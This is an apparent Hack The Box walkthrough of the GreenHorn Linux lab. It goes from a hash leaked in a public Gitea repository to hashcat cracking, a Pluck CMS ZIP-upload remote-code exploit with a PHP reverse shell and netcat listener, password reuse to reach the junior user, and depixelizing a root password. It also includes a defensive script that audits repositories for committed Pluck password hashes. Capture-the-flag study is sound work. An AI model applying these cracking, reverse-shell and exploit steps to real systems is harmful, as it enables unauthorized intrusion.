Hack The Box / LINUX / 2026-03-27

Hack The Box — GreenHorn (Linux)

Pluck CMS credential recovery from an exposed Gitea repository, authenticated ZIP-upload RCE, lateral move to junior via password reuse, and root access by depixelizing a leaked password from an image embedded in a PDF.

Target

  • IP: 10.129.25.250

Recon

sudo nmap -sC -sV 10.129.25.250 -p- -vv
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_  256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-generator: pluck 4.7.18
| http-title: Welcome to GreenHorn ! - GreenHorn
|_Requested resource was http://greenhorn.htb/?file=welcome-to-greenhorn
| http-methods:
|_  Supported Methods: GET HEAD POST
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=924c9e8af7b2ade0; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=EKDiDFpfJ5puXcbg3OdkOObwvhA6MTcyMTc2MTA5MTg4MDg3NzgxNw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 23 Jul 2024 18:58:11 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=6feb3f594c7c96cb; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=CLvb-6K3l7XYDq7BE9pSRwxaTxQ6MTcyMTc2MTA5NzIyOTYyNjIyNw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 23 Jul 2024 18:58:17 GMT
|_    Content-Length: 0

Add greenhorn.htb to /etc/hosts and open http://greenhorn.htb/login.php. The site runs Pluck 4.7.18, as the http-generator header above also shows.

Port 3000 is a Gitea instance at http://greenhorn.htb:3000/. Browsing the repositories reveals GreenAdmin/GreenHorn, which is publicly readable; download it.

In data/settings/pass.php the repository contains the Pluck admin password hash:

<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

Save the hash to a file and crack it; hashcat mode 1700 is raw (unsalted) SHA-512:

hashcat -a 0 -m 1700 ./hash ./rockyou.txt
d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163:iloveyou1
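The weak point here is a CMS password hash committed to a readable repository. The following is an added example (not part of the original writeup) of a small audit script a maintainer could run over a Pluck checkout before pushing it to Gitea: it locates data/settings/pass.php, extracts the $ww digest, and reports whether it matches a short list of banned passwords. The directory layout is taken from the page; the sample repository and its placeholder password are constructed in-code.

```python
"""Audit a Pluck CMS tree for a committed data/settings/pass.php.

Pluck stores the admin password in pass.php as an unsalted SHA-512 hex
digest ($ww = '<128 hex chars>'), which is why hashcat mode 1700 cracks
it directly. This script is an added example, not Pluck's own code.
"""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List, Optional

# Matches the assignment found in Pluck's pass.php on the page.
PASS_RE = re.compile(r"\$ww\s*=\s*'([0-9a-fA-F]{128})'")


def extract_pluck_hash(php_source: str) -> Optional[str]:
    """Return the SHA-512 digest assigned to $ww, or None if absent."""
    m = PASS_RE.search(php_source)
    return m.group(1).lower() if m else None


def check_weak(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the banned password whose raw SHA-512 equals digest, else None."""
    for pw in candidates:
        if hashlib.sha512(pw.encode()).hexdigest() == digest:
            return pw
    return None


def audit_tree(root: Path, banned: Iterable[str] = ()) -> List[Dict]:
    """Find every pass.php under root that carries a Pluck hash."""
    findings = []
    banned = list(banned)
    for path in root.rglob("pass.php"):
        digest = extract_pluck_hash(path.read_text(errors="ignore"))
        if digest is None:
            continue
        findings.append({"path": path.relative_to(root).as_posix(),
                         "sha512": digest,
                         "weak_password": check_weak(digest, banned)})
    return findings


def demo() -> List[Dict]:
    """Build a constructed checkout in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as d:
        settings = Path(d) / "data" / "settings"
        settings.mkdir(parents=True)
        # Constructed: the digest is derived here from a placeholder password.
        fake = hashlib.sha512(b"placeholder-pw").hexdigest()
        (settings / "pass.php").write_text(f"<?php\n$ww = '{fake}';\n?>\n")
        return audit_tree(Path(d), ["123456", "placeholder-pw"])
```

A finding with a non-empty weak_password means the committed hash is recoverable with a wordlist; the fix is to keep data/settings/ out of version control and rotate the password.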

Go to http://greenhorn.htb/login.php and log in with the recovered password.

Authenticated RCE via Pluck exploit

Exploit reference:

  • https://www.exploit-db.com/exploits/51592

Download the exploit. Replace localhost/pluck with greenhorn.htb. In login_payload, set the cont1 field to the recovered password. Change miri.php to php-reverse-shell.php, then prepare the ZIP module it uploads:

cp /usr/share/webshells/php/php-reverse-shell.php .
zip shell.zip php-reverse-shell.php

Start a listener:

nc -vlnp 4444

Run the exploit and provide the path to the created ZIP. We get a reverse shell as the web server user.

User pivot and root

su junior

The same password is reused for the junior account:

  • iloveyou1

Download the PDF from junior's home directory. It contains a pixelated password. Extract the pixelated image from the PDF (for example with LibreOffice Draw).

Useful tool for recovering text from pixelated screenshots:

  • https://github.com/spipm/Depix
python3 depix.py -p ../test.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o ../test1.png

Open test1.png; the recovered text reads:

sidefromsidetheothersidesidefromsidetheotherside
su root

Use the recovered password. We get a root shell.